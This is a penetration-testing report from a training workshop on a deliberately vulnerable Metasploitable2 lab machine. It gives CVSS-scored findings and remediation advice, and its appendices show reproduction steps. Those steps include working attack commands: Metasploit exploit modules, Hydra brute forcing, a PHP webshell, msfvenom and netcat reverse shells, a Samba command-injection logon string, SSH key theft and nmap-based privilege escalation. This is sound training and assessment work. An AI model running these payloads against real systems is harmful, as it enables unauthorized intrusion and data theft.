# Network Pentesting

Author: Lang Ngo

Date: December 18, 2023

---

## Table of Contents

- [[#Network Pentesting Report - 2023]]
- [[#Executive Summary]]
  - [[#Use of this Document]]
  - [[#Synopsis]]
  - [[#Scope of Work]]
  - [[#Constraints]]
  - [[#Vulnerability Findings]]
- [[#Summary of Findings]]
  - [[#Vulnerable IRC Server]]
  - [[#Weak Login Credentials on FTP Server]]
  - [[#Samba 3.0.20-Debian Insecure Configuration]]
  - [[#Java RMI Server Insecure Configuration and Validation]]
  - [[#DistCC Daemon Unrestricted Access and Remote Command Execution]]
  - [[#Distributed Ruby (DRb) Remote Code Execution]]
  - [[#Outdated and Exploitable VSFTP Protocol]]
  - [[#WebDav Misconfiguration and Exploitation]]
  - [[#Weak Credentials in Apache Tomcat Manager]]
  - [[#Unsecured MySQL Database]]
  - [[#PostgreSQL Database Weak Login Credentials]]
  - [[#Telnet Weak User Credentials and Insecure SSH Key Storage]]
  - [[#FTP Server Anonymous Access and Potential Data Exposure]]
  - [[#SMTP User Enumeration]]
- [[#Appendix]]
  - [[#Appendix 1]]
  - [[#Appendix 2]]
  - [[#Appendix 3]]
  - [[#Appendix 4]]
  - [[#Appendix 5]]
  - [[#Appendix 6]]
  - [[#Appendix 7]]
  - [[#Appendix 8]]
  - [[#Appendix 9]]
  - [[#Appendix 10]]
  - [[#Appendix 11]]
  - [[#Appendix 12]]
  - [[#Appendix 13]]

# Executive Summary

## Use of this Document

This report is intended to provide detail and context on the security issues discovered during the Network Pentesting Workshop (2023). It provides technical descriptions of the security weaknesses found in the exercises and course materials provided.

## Synopsis

For training and learning purposes, a Metasploitable2 server with known vulnerabilities was provided for the Network Pentesting Workshop (2023). The exercises were performed by Lang Ngo. The report focuses on security vulnerabilities, exploits, and mitigations, all within the training environment. It covers the security issues and vulnerabilities of the testing environment and gives recommendations for each.
All vulnerabilities found were intentional and present for demonstration purposes.

## Scope of Work

All of the following assessments were conducted within virtual machines on the same network.

## Constraints

1. The assessment was performed after the Network Pentesting Workshop course.
2. The scope of the assessment was the lab environment and the information provided.

## Vulnerability Findings

The severity of each finding is measured using CVSS v4.0 metrics: https://www.first.org/cvss/calculator/4.0

# Summary of Findings

| Vulnerability | Severity | CVSS Score |
|--------------|-----------|------------|
| Vulnerable IRC Server | Critical | 9.9 |
| Weak Login Credentials on FTP Server | Critical | 9.9 |
| Samba 3.0.20-Debian Insecure Configuration | Critical | 9.3 |
| JAVA RMI Service | Critical | 9.3 |
| DistCC Daemon Service on Port 3632 | Critical | 9.3 |
| Distributed Ruby (DRb) | Critical | 9.3 |
| Outdated and Exploitable VSFTP Protocol | Critical | 9.1 |
| WebDav Misconfiguration and Exploitation | Critical | 9.1 |
| Weak Credentials in Apache Tomcat Manager | High | 8.8 |
| Unsecured MySQL Database | High | 8.8 |
| PostgreSQL Database Weak Login Credentials | High | 8.8 |
| Telnet Service and Compromised SSH Private Key | High | 8.6 |
| Anonymous FTP Login | Medium | 6.9 |
| SMTP User Enumeration | Medium | 6.9 |

# Vulnerable IRC Server

| Field | Description |
| --- | --- |
| Vulnerability | UnrealIRCd 3.2.8.1 Backdoor Root Access |
| CVSS Score | 9.9 |
| Severity | Critical |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N |
| Target | 10.0.1.3 port 6667 - UnrealIRCd 3.2.8.1 |
| Impact | Full System Compromise: Unauthorized root access allows complete control over the system, leading to potential data theft, system manipulation, and deployment of further malicious activity. <br><br>Data Integrity Risk: Root access compromises the integrity of all data and processes on the system. <br><br>Network Propagation: The compromised system can be used as a launchpad for further attacks within the network. |
| Details | The exploit took advantage of a backdoor (classified under CWE-506). This unauthorized entry point allows an attacker to bypass standard authentication, gaining high-level privileges and control over the system. |
| Reproduction Steps | [[#Appendix 13]] |
| Recommendation | Immediate Update or Replacement: Upgrade UnrealIRCd to a non-vulnerable version or replace it with a different, secure IRC server. |
| References | - https://www.unrealircd.org/docs/Upgrading<br><br>- https://cwe.mitre.org/data/definitions/506.html |

---

# Weak Login Credentials on FTP Server

| Field | Description |
| --- | --- |
| Vulnerability | Weak Login Credentials on FTP Server |
| CVSS Score | 9.9 |
| Severity | Critical |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N |
| Target | 10.0.1.3 port 21 - FTP Service |
| Impact | Unauthorized Access: Weak credentials can be brute-forced easily, allowing unauthorized users to gain access to the FTP server. This could lead to unauthorized data access, modification, or deletion. <br><br>Data Breach Risk: Once inside the FTP server, an attacker could access sensitive information, leading to a data breach. <br><br>Potential for Further Attacks: Compromised FTP credentials might be used to gain further access into the network, especially if the same credentials are reused across multiple services. |
| Details | The FTP server was found to accept weak login credentials, making it highly susceptible to brute-force attacks, in which an adversary systematically tries candidate passwords until the correct one is found. The success of such an attack indicates a critical lack of password security measures. |
| Reproduction Steps | [[#Appendix 3]] |
| Recommendation | Implement Strong Password Policies: Enforce the use of complex passwords that include a mix of uppercase letters, lowercase letters, numbers, and special characters. <br><br>Regular Password Changes: Mandate regular password changes to limit the long-term usefulness of stolen credentials. <br><br>Account Lockout Policies: Implement account lockout policies under which multiple failed login attempts temporarily disable the account, thwarting brute-force attempts. |
| References | - [NIST Guidelines on Password Security](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf)<br><br>- [OWASP Guide to Authentication](https://owasp.org/www-project-cheat-sheets/cheatsheets/Authentication_Cheat_Sheet.html) |

---

# Samba 3.0.20-Debian Insecure Configuration

| Field | Description |
| --- | --- |
| Vulnerability | Samba 3.0.20-Debian Insecure Configuration |
| CVSS Score | 9.3 |
| Severity | Critical |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
| Target | 10.0.1.3 - Samba 3.0.20-Debian/SMB |
| Impact | Remote Code Execution: Exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system with root privileges. <br><br>Unauthorized Access: The vulnerability could enable unauthorized users to gain complete control over the affected server. <br><br>Data Breach Risk: Once the server is compromised, sensitive information could be accessed, altered, or deleted. <br><br>Network Compromise: The compromised host could be used as a pivot point for further attacks within the network. |
| Details | A critical vulnerability was identified in the Samba software suite, specifically version 3.0.20 running on Debian. Samba provides file and print services to SMB/CIFS clients, enabling interoperability between Unix/Linux and Windows systems. This version was found to be susceptible to remote code execution, posing significant security risk. |
| Reproduction Steps | [[#Appendix 5]] |
| Recommendation | Immediate Update: Upgrade the Samba server to the latest version, in which this vulnerability has been patched. <br><br>Access Control and Firewalls: Restrict access to SMB ports (e.g., 139, 445) from untrusted networks and implement strict firewall rules. |
| References | - Samba Official Website: [Samba.org](https://www.samba.org/) <br>- https://www.exploit-db.com/exploits/16320 |

---

# Java RMI Server Insecure Configuration and Validation

| Field | Description |
| --- | --- |
| Vulnerability | Java RMI Server Insecure Configuration and Validation |
| CVSS Score | 9.3 |
| Severity | Critical |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
| Target | 10.0.1.3 port 1099 - Java RMI |
| Impact | Confidentiality: Compromised, as unauthorized access allows the disclosure of sensitive data. <br><br>Integrity: Compromised, as an attacker with root access can modify system and application data. <br><br>Availability: Compromised, as an attacker can disrupt services or deploy malicious software. |
| Details | A critical vulnerability was identified in the Java RMI (Remote Method Invocation) service. The service was found to be improperly configured and to perform inadequate validation, leading to unauthorized root-level access. |
| Reproduction Steps | [[#Appendix 9]] |
| Recommendation | Patch and Update: Ensure that the Java RMI service and all related components are updated to their latest versions; patches commonly address these vulnerabilities. <br><br>Restrict Access: Implement firewall rules restricting access to port 1099 to known and trusted sources only. <br><br>Security Hardening: Review the configuration of the Java RMI service and apply security best practices, including strong authentication and access controls. |
| References | - https://docs.oracle.com/javase/8/docs/technotes/guides/rmi/<br><br>- http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html<br><br>- https://nvd.nist.gov/vuln/detail/CVE-2011-3556 |

---

# DistCC Daemon Unrestricted Access and Remote Command Execution

| Field | Description |
| --- | --- |
| Vulnerability | DistCC Daemon Service on Port 3632 |
| CVSS Score | 9.3 |
| Severity | Critical |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
| Target | 10.0.1.3 port 3632 - DistCC Daemon (distccd) |
| Impact | Confidentiality: At risk due to potential unauthorized access to system files and sensitive information. <br><br>Integrity: At risk, as the attacker could modify system configurations and files. |
| Details | The DistCC daemon on the target machine is configured to accept connections from any IP address (`--allow 0.0.0.0/0`), leaving it open to remote unauthorized access. |
| Reproduction Steps | [[#Appendix 10]] |
| Recommendation | Patch and Update: Update DistCC to the latest version, which may not be vulnerable to this exploit. <br><br>Restrict Network Access: Configure DistCC to accept connections only from trusted IP addresses or from within a secure network segment. <br><br>Firewall Configuration: Set up firewall rules restricting access to port 3632 to known sources. <br><br>Regular Auditing: Periodically audit the service and host machine for unauthorized access or modifications. <br><br>Least Privilege Principle: Run services with the minimum necessary permissions to reduce the impact of a successful exploit. <br><br>Monitor and Log: Implement monitoring and logging to detect unusual activity related to the DistCC service. |
| References | - https://www.distcc.org/<br><br>- https://nvd.nist.gov/vuln/detail/CVE-2004-2687 |

---

# Distributed Ruby (DRb) Remote Code Execution

| Field | Description |
| --- | --- |
| Vulnerability | Distributed Ruby (DRb) Remote Code Execution |
| CVSS Score | 9.3 |
| Severity | Critical |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
| Target | 10.0.1.3 port 8787 - Distributed Ruby (DRb) |
| Impact | Unauthorized Code Execution: The vulnerability allows remote attackers to execute arbitrary code on the target machine, compromising its security. <br><br>System Compromise: Successful exploitation can lead to a complete system takeover, allowing attackers to manipulate or destroy data, create new accounts with full user rights, and use the compromised machine as a foothold in the network. <br><br>Data Breach and Leakage: Sensitive data on the target machine and network can be accessed, exfiltrated, or manipulated. |
| Details | The Distributed Ruby service running on port 8787 of the target machine is vulnerable to remote code execution. |
| Reproduction Steps | [[#Appendix 14]] |
| Recommendation | Immediate Patching: Apply any available patches or updates to the DRb service to rectify known vulnerabilities. <br><br>Service Configuration Review: Review and harden the DRb service configuration to prevent unauthorized access. <br><br>Network Segmentation and Firewalling: Restrict network access to the DRb service using firewalls or network segmentation. |
| References | - Exploit-DB Entry: https://www.exploit-db.com/exploits/17031<br><br>- DRb Security Best Practices: [Ruby DRb Documentation](https://www.ruby-doc.org/stdlib-2.7.0/libdoc/drb/rdoc/DRb.html) |

---

# Outdated and Exploitable VSFTP Protocol

| Field | Description |
| --- | --- |
| Vulnerability | Outdated and Exploitable VSFTP Protocol |
| CVSS Score | 9.1 |
| Severity | Critical |
| CVSS Vector | CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:L/SI:L/SA:L |
| Target | 10.0.1.3 port 21 - FTP (vsftpd version 2.3.4) |
| Impact | The vulnerability allows an attacker to gain unauthorized access to and control over the affected server. <br><br>Access is obtained at the level of the user under which the vsftpd service runs. <br><br>The resulting breach of confidentiality and integrity can lead to significant data loss; sensitive information stored on the server can be stolen or manipulated. |
| Details | This vulnerability pertains to a specific version of **`vsftpd`**, a widely used FTP server for UNIX-like systems, which is known to have a critical security flaw. The **`vsftpd`** version running on the Metasploitable2 server was identified as vulnerable to external attacks.<br><br>**Vulnerable Version**: 2.3.4<br><br>The flaw in this version of **`vsftpd`** is a malicious backdoor that was added to the VSFTPD download archive. According to the most recent information available, the backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011, and it was removed on July 3rd 2011. |
| Reproduction Steps | [[#Appendix 1]] |
| Recommendation | Patch or upgrade the **`vsftpd`** service to a non-vulnerable/latest version.<br><br>Review and enhance the FTP server configuration to bolster security. Options include disabling unnecessary services, employing strong authentication methods, and using secure protocols such as FTPS or SFTP. |
| References | https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ <br><br>https://www.exploit-db.com/exploits/49757 |

---

# WebDav Misconfiguration and Exploitation

| Field | Description |
| --- | --- |
| Vulnerability | WebDav Misconfiguration and Exploitation |
| CVSS Score | 9.1 |
| Severity | Critical |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
| Target | 10.0.1.3 port 80 - WebDav Service |
| Impact | Server Compromise: The misconfigured WebDav implementation allows remote attackers to execute arbitrary code, potentially leading to full server compromise. <br><br>Unauthorized Data Access: Attackers can access sensitive data and modify or delete files hosted on the server, affecting the confidentiality, integrity, and availability of data. <br><br>Network Lateral Movement: The foothold could serve as a gateway for further attacks within the internal network, widening the scope of the incident. |
| Details | WebDav, an extension of HTTP, facilitates collaborative file editing and management on remote servers. <br><br>The identified misconfiguration allows unauthorized file uploads, including executable scripts, with severe security implications. |
| Reproduction Steps | [[#Appendix 4]] |
| Recommendation | Restrict File Uploads: Limit the types of files that can be uploaded via WebDAV. Disallow executable and script file uploads (e.g., .php, .exe, .bat) to prevent execution of unauthorized code, and implement server-side file upload filtering.<br><br>WebDAV Configuration Review and Hardening: Conduct a comprehensive review of the WebDAV configuration. Ensure that only authorized users have write access, and apply the principle of least privilege by restricting user permissions to the minimum required for their role. <br><br>Regular Software Updates: Ensure that the WebDAV service and the underlying web server software are regularly updated to the latest versions, and apply security patches promptly to address known vulnerabilities. <br><br>Implement Access Controls and Authentication Mechanisms: Use strong authentication methods for WebDAV access, such as two-factor authentication, and implement network-level access controls so that only trusted IP addresses can reach the WebDAV service. |
| References | - "Web Distributed Authoring and Versioning (WebDAV)" by IETF, RFC 4918: [WebDAV RFC](https://tools.ietf.org/html/rfc4918) <br><br>- "Security Considerations for WebDAV" by OWASP: [OWASP WebDAV Security](https://owasp.org/www-project-top-ten/) |

---

# Weak Credentials in Apache Tomcat Manager

| Field | Description |
| --- | --- |
| Vulnerability | Weak Credentials in Apache Tomcat Manager |
| CVSS Score | 8.8 |
| Severity | High |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
| Target | 10.0.1.3 port 8180 - Apache Tomcat 5.5 |
| Impact | An attacker with access to the Tomcat Manager application can deploy malicious web applications, which could lead to remote code execution, data leakage, or even complete takeover of the server, especially if the Tomcat process runs with high privileges. |
| Details | The Tomcat Manager application was found to be protected by weak credentials, which allowed unauthorized access to the management interface. This weakness was exploited to deploy a reverse shell, enabling remote command execution as the Tomcat user. |
| Reproduction Steps | [[#Appendix 8]] |
| Recommendation | Update Apache Tomcat to the latest stable version to fix known vulnerabilities. Implement strong, unique credentials for the Tomcat Manager and restrict access to trusted users only. <br><br>Consider additional layers of security, such as network firewalls or access control lists (ACLs), to limit access to the Tomcat Manager interface. <br><br>Regularly audit and review logs for unauthorized access attempts or other suspicious activity, and conduct regular vulnerability assessments to identify and remediate security weaknesses. |
| References | - https://tomcat.apache.org/upgrading.html <br>- https://tomcat.apache.org/security-5.html |

---

# Unsecured MySQL Database

| Field | Description |
| --- | --- |
| Vulnerability | Unsecured MySQL Database |
| CVSS Score | 8.8 |
| Severity | High |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
| Target | 10.0.1.3 port 3306 - MySQL Database |
| Impact | Data Breach Risk: Unauthorized access could lead to sensitive data exposure. <br><br>Integrity Threat: Potential for data alteration or deletion without oversight. <br><br>Service Disruption: Possibility of service interruption due to malicious activity. |
| Details | The MySQL service on the target machine accepts connections without proper authentication. Using the command `mysql -h 10.0.1.3 --ssl=0 -u root -p` with an empty password, unauthorized users gain full access to the MySQL database. |
| Reproduction Steps | [[#Appendix 11]] |
| Recommendation | Immediate Password Setup: Set a strong, unique password for the root user and for all accounts with database access. <br><br>Review User Accounts: Audit existing accounts in the database for unauthorized users. <br><br>Implement SSL/TLS: Enforce encrypted connections to the database to protect data in transit. <br><br>Regular Audits: Regularly audit database access logs for unauthorized access attempts. <br><br>Access Controls: Restrict database access to authorized IP addresses or VPNs. <br><br>Security Patching: Ensure MySQL is updated to the latest version with all security patches applied. |
| References | https://dev.mysql.com/doc/mysql-security-excerpt/5.7/en/ |

---

# PostgreSQL Database Weak Login Credentials

| Field | Description |
| --- | --- |
| Vulnerability | PostgreSQL Database Weak Login Credentials |
| CVSS Score | 8.8 |
| Severity | High |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
| Target | 10.0.1.3 port 5432 - PostgreSQL Database |
| Impact | Data Exposure: Unauthorized access could lead to exposure of sensitive data stored in the database. <br><br>Database Manipulation: Potential for data alteration, addition, or deletion by unauthorized users. <br><br>System Compromise: Weak database credentials can be a gateway to further exploitation and system compromise. |
| Details | The PostgreSQL service on the target machine is configured with weak, default login credentials. This allows attackers to gain unauthorized access to the database easily, posing a significant risk to data integrity and security. |
| Reproduction Steps | [[#Appendix 12]] |
| Recommendation | Immediate Password Change: Replace the default credentials with strong, unique usernames and passwords for all database accounts. <br><br>Credential Policy: Establish a policy for regular password updates and complexity requirements. <br><br>Audit User Accounts: Review all user accounts in the PostgreSQL database for unauthorized or unnecessary access privileges. |
| References | - PostgreSQL Security: https://www.postgresql.org/support/security/ <br>- CWE-798: Use of Hard-coded Credentials: https://cwe.mitre.org/data/definitions/798.html |

---

# Telnet Weak User Credentials and Insecure SSH Key Storage

| Field | Description |
| --- | --- |
| Vulnerability | Telnet Weak User Credentials and Insecure SSH Key Storage |
| CVSS Score | 8.6 |
| Severity | High |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N |
| Target | 10.0.1.3 port 23 - Telnet <br>10.0.1.3 port 22 - SSH |
| Impact | Successful exploitation of these weaknesses allows an attacker to gain unauthorized access to the system with the privileges of the compromised user. This can lead to further exploitation such as privilege escalation, data theft, and persistent access to the system. |
| Details | The Telnet service on the target system accepts connections without secure authentication methods, which allowed the msfadmin user's credentials to be brute-forced. Additionally, the server stores SSH private keys in a location accessible to the compromised user. |
| Reproduction Steps | [[#Appendix 7]] |
| Recommendation | Disable the Telnet service if it is not necessary, or ensure it requires secure authentication methods if it must remain operational. <br><br>Review the server's security policies to restrict access to sensitive files such as private SSH keys. <br><br>Enforce the use of strong, unique passwords for all user accounts and implement account lockout policies to mitigate brute-force attacks. |
| References | https://www.sans.org/white-papers/1180/ |

---

# FTP Server Anonymous Access and Potential Data Exposure

| Field | Description |
| --- | --- |
| Vulnerability | FTP Server Anonymous Access and Potential Data Exposure |
| CVSS Score | 6.9 |
| Severity | Medium |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N |
| Target | 10.0.1.3 port 21 - FTP Service |
| Impact | Unauthorized Data Access: Anonymous FTP login allows unauthenticated users to access the FTP server. This could lead to unauthorized viewing, downloading, or uploading of files, depending on the permissions set on the server.<br><br>Data Leakage: Sensitive information could be exposed if stored in directories accessible via anonymous login.<br><br>Potential for Further Exploitation: If write permissions are enabled, this weakness could be used to upload malicious files, potentially leading to further compromise of the system. |
| Details | The FTP server was found to allow anonymous logins. Anonymous FTP is a server setting that permits any user to access shared files without providing a username or password. This can be useful for public file sharing but poses significant security risk when sensitive data is involved or when write permissions are mistakenly granted. |
| Reproduction Steps | [[#Appendix 2]] |
| Recommendation | Disable Anonymous Logins: Unless there is a specific requirement for anonymous access, it should be disabled; this is typically configured in the FTP server settings. <br><br>Implement Access Controls: If anonymous login is necessary, restrict permissions to read-only and limit the accessible directories. <br><br>Regular Audits: Conduct regular audits of FTP server settings to ensure that anonymous access is not inadvertently enabled. <br><br>Use Secure FTP Variants: Consider secure alternatives such as SFTP (SSH File Transfer Protocol) or FTPS (FTP Secure), which provide better authentication mechanisms. |
| References | https://www.cerberusftp.com/blog/eight-essential-tips-for-securing-an-ftp-or-sftp-server/ |

---

# SMTP User Enumeration

| Field | Description |
| --- | --- |
| Vulnerability | SMTP User Enumeration |
| CVSS Score | 6.9 |
| Severity | Medium |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N |
| Target | 10.0.1.3 port 25 - SMTP |
| Impact | Successful enumeration of users on an SMTP server can lead to a range of impacts:<br><br>It may aid attackers in mounting more targeted attacks, such as spear-phishing campaigns.<br><br>It could facilitate brute-force password attacks against known user accounts.<br><br>A list of valid users can also help in crafting other attacks that rely on usernames, such as attempting to access other services where the same usernames are used. |
| Details | SMTP user enumeration allows an unauthenticated attacker to obtain a list of valid usernames from the SMTP service, which can be used for further attacks or exploitation. The usernames obtained during the enumeration process include system and service accounts that could have elevated privileges within the system or network. |
| Reproduction Steps | [[#Appendix 6]] |
| Recommendation | Disable verbose SMTP responses so that the server does not disclose information about user accounts.<br><br>Implement rate limiting and account lockout policies to mitigate brute-force attacks.<br><br>Consider deploying SMTP authentication mechanisms to protect against unauthorized use of the SMTP service.<br><br>Regularly audit and review accounts, ensuring that only necessary accounts exist and are active.<br><br>Patch and update the SMTP server software to the latest version to address known vulnerabilities. |
| References | https://www.kali.org/tools/smtp-user-enum/ |

---

# Appendix

## Appendix 1

Used the Metasploit Framework:

```bash
msfconsole
```

```bash
use exploit/unix/ftp/vsftpd_234_backdoor
```

```bash
options
```

![[Attachments/08954202d38e07054902952077abbb22_MD5.png]]

```bash
set RHOSTS 10.0.1.3
```

```bash
run
```

Successfully gained root access:

![[Attachments/a6c77d853183295b99a524ac67fb9bd1_MD5.png]]

## Appendix 2

**Anonymous FTP login is available**

Connect to the FTP server at **`10.0.1.3`** with the command:

```bash
ftp 10.0.1.3
```

Use `anonymous` as the username and anything for the password. Being granted access without proper authentication confirms the vulnerability.

![[Attachments/740d77a1a0a7facf3a4d06b369c6957b_MD5.png]]

## Appendix 3

Brute-forced the FTP login credentials using Hydra:

```bash
hydra -l msfadmin -P passwords.txt ftp://10.0.1.3:2121 -V
```

![[Attachments/e9170bd5859d9fe277ab261196e7452f_MD5.png]]

Used the brute-forced login credentials to access the FTP server:

![[Attachments/cf308dfea15e502a1b7c59977b2af54b_MD5.png]]

## Appendix 4

Used curl to inspect the HTTP service:

```bash
curl 10.0.1.3:80
```

![[Attachments/f8a296f1ac27f6c36c9bbcbafb71767e_MD5.png]]

Ran davtest to check whether files with several different extensions can be uploaded, and whether any of those extensions are executed by the server.
```bash davtest -url [http://10.0.1.3:80/dav](http://10.0.1.3/dav) ``` ![[Attachments/068842582e75ea63911c38b0d95c0e15_MD5.png]] Results show that it is possible to upload a php file and execute it. Created a simple php file on the server named webshell.php ```bash <?php echo system($_GET["cmd"]); ?> ``` Used `cadaver` to upload the php file to the server. ```bash cadaver http://10.0.1.3/dav ``` ![[Attachments/6f9affa386df3995f7ba6d6ac588e538_MD5.png]] Access and execute the php file that was put into the dav adding and passing a simple whoami command ```bash curl http://10.0.1.3/dav/webshell.php?cmd=whoami ``` Now that we know a simple web php shell works, we can now use a full php reverse shell Access and execute the php file that was put into the dav adding and passing a simple whoami command ```bash curl http://10.0.1.3/dav/webshell.php?cmd=whoami ``` Now that we know a simple web php shell works, we can now use a full php reverse shell [https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) ```bash wget [https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) ``` Edit the ip address and the port. 
Use cadaver again to upload the php file to the server ```bash cadaver http://10.0.1.3/dav ``` ![[Attachments/7b6a2e9359f5ff9a6e8fb20cd753e516_MD5.png]] Create a listener for port 443 ```bash nc -lvnp 443 ``` se curl to execute the grev.php ```bash curl http://10.0.1.3/dav/grev.php ``` Successful Reverse Shell ![[Attachments/87f4cc8b6361da276dddfc8d3ae0a70d_MD5.png]] Upgraded Shell to Bash Shell ![[Attachments/5c97fb487a865b580e9811a8933816fc_MD5.png]] ## Appendix 5 Enumerated version of SMB ```bash rpcclient ``` ```bash enum4linux 10.0.1.3 ``` ![[Attachments/bf2ab63d139736eff7ab2a9d4cdd0d3f_MD5.png]] Current version is Unix (Samba 3.0.20-Debian) Use msfconsole and run: ```bash exploit/multi/samba/usermap_script ``` Use: ```bash show options ``` and then set the RHOSTS to the target machine in this case 10.0.1.3 ```bash set RHOSTS 10.0.1.3 ``` ![[Attachments/e2d8f7872124273e1b449248cc1e050e_MD5.png]] ```bash run ``` ![[Attachments/bddb6000e77502b5900295a4c4428c20_MD5.png]] Result is root access on the machine. Another method is to use `smbclient` ```bash smbclient //10.0.1.3/IPC$ ``` then setup a listener in another terminal tab ```bash nc -lvnp 4444 ``` then use a reverse shell ```bash logon "/=nc '10.0.1.1' 4444 -e /bin/bash" ``` ![[Attachments/19a131e51a943e5b77a88da2c3cf87a1_MD5.png]] ## Appendix 6 Load and Use `msfconsole` ```bash search smtp user enum ``` ```bash auxiliary/scanner/smtp/smtp_enum ``` ![[Attachments/bd5833ec56bde17df017bffa5d2bed0b_MD5.png]] ```bash use 1 ``` ![[Attachments/a9abe8e29ccfcb3f711f23b7d86ccd70_MD5.png]] ```bash set RHOSTS 10.0.1.3` ``` ```bash run ``` ![[Attachments/df057c8f78e156d9313306d8404f9998_MD5.png]] Another Method to Enum Users ```bash smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.1.1.3 ``` The username that the modules find can be then used to test functionality when connecting to the port 25 SMTP. 
```bash nc 10.0.1.3 25 ``` ```bash vrfy nobody ``` The above command verifies and checks the username nobody ## Appendix 7 Install telnet on Kali Linux with: ```bash sudo apt install telnet ``` Log into the telnet ```bash telnet 10.0.1.3 23 ``` ![[Attachments/30f33ffd1c19e67308915f295dfdf401_MD5.png]] Privilege Escalation to get SSH key for a user ![[Attachments/03c94908055dd05b4bca0d488854ce98_MD5.png]] ![[Attachments/b0f584276d91674e70cb131905834669_MD5.png]] Read the private ssh file id_rsa ```bash cat id_rsa ``` Copy the private key, and exit the telnet connection ![[Attachments/92954f9ef3b4ebf18c5a60fab7d8ef93_MD5.png]] ```bash exit ``` Create the id_rsa file on the attack machine ```bash nano id_rsa ``` modify permissions to be able to use the file ```bash chmod 600 id_rsa ``` then ssh into the vulnerable ssh user account using the private key that was created ```bash ssh -i id_rsa -oHostKeyAlgorithms=+ssh-dss [email protected] ``` ![[Attachments/0575bab10bcb7880bd76e39e9626c60e_MD5.png]] ## Appendix 8 Apache Tomcat 5 on port 8180 default credentials were used for tomcat manager at: ```bash 10.0.1.3:8180/manager ``` `tomcat` was both the username and password ![[Attachments/90b0939a3845c39d6e6e01b378a9547c_MD5.png]] Use access to tomcat manager to deploy malicious code to get reverse shell / terminal access Need to deploy a WAR file (java code deployment) Use msfvenom to generate a war file ```bash msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.1.1 LPORT=443 -f war -o shell.war ``` Using a browser upload the payload shell.war to the tomcat server ![[Attachments/f809fd67044d118e20ca76e2e96cc345_MD5.png]] Go back to the shell.war file and get the jsp file name ![[Attachments/d073a717a1650c9b810ddfbc0ddc38fe_MD5.png]] Set a listener ```bash nc -lvnp 443 ``` go to: ```bash http://10.0.1.3:8180/shell/uwtfmxbyj.jsp ``` Reverse Shell Connection established ![[Attachments/30c1a2a6ab2da4b87cf07f1c4727994f_MD5.png]] Upgrading Reverse Shell 
![[Attachments/f6c32c88ee189b825d4328a31f7250d7_MD5.png]] Privilege Escalation ```bash find / -perm -4000 2>/dev/null ``` Result: ![[Attachments/2dd974ee55a44f41e49215e31161bd8c_MD5.png]] Vulnerable Nmap Version ```bash nmap --interactive ``` ```bash nmap> !sh ``` Achieved Root Access ![[Attachments/5a042bd2215f83ae9a479ba2f64b5163_MD5.png]] ## Appendix 9 JAVA RMI ```bash msfconsole ``` ```bash search java rmi ``` Found an available exploit ```bash use exploit/multi/misc/java_rmi_server ``` ![[Attachments/b212034938d1751bd1367461a92ec1c4_MD5.png]] change the options to local host and local port ```bash set LHOST 10.0.1.1 ``` change the RHOSTS to the target machine ```bash set RHOSTS 10.0.1.3 ``` change the HTTPDELAY to 30 seconds ```bash set HTTPDELAY 30 ``` Reverse shell achieved and root access ![[Attachments/2cdcf52d8c0bfb4b9d85dad4b7b75507_MD5.png]] ## Appendix 10 distccd Use searchsploit ```bash searchsploit distc ``` ![[Attachments/7edfe08937768b3c4a3b33572020fa45_MD5.png]] Exploit is available through metasploit ```bash msfconsole ``` ```bash search distcc ``` ![[Attachments/c12a53a58c7bbec12c130e85261aad3b_MD5.png]] ```bash set RHOSTS 10.0.1.3 ``` ```bash show payloads ``` ```bash set payload cmd/unix/reverse ``` ![[Attachments/eec32921f51a3fb7d32611b2c1f1f462_MD5.png]] run Reverse shell achieved for Daemon user ![[Attachments/a6e5213e3def38b88e8ec4ba2dc7889a_MD5.png]] ## Appendix 11 Mysql on port 3306/tcp ```bash mysql -h 10.0.1.3 --ssl=0 -u root -p ``` with an empty password allowed access into the database ![[Attachments/943bb16f94d7df3a5d74b17fd3b27e9f_MD5.png]] Run 